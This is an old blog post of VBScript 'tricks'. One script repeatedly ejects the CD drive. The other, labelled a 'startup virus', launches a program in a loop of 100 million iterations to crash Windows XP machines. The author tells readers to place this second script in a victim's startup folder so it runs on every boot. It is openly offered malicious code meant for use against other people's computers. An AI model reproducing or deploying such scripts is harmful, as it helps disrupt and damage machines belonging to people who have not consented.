.

.

Wednesday 15 August 2012

CD Drive eject & load Automatically !

 
 
friends,copy the below code and save it 
as anything.vbs and your CD Drive will 
eject & load Automatically !

to stop it- open task manager
go to process
and end the process of wscript.exe
 
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count -1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count -1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

startup virus




hi! Friends
Here copy this to notepad and save it as something.vbs and click on it, it will only crash ur computer but u can put it in da startup folder of da victims computer:

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next




   




it only works with windows xp

 

Get Latest Updates: Subscribe Now | Like Us on Facebook

X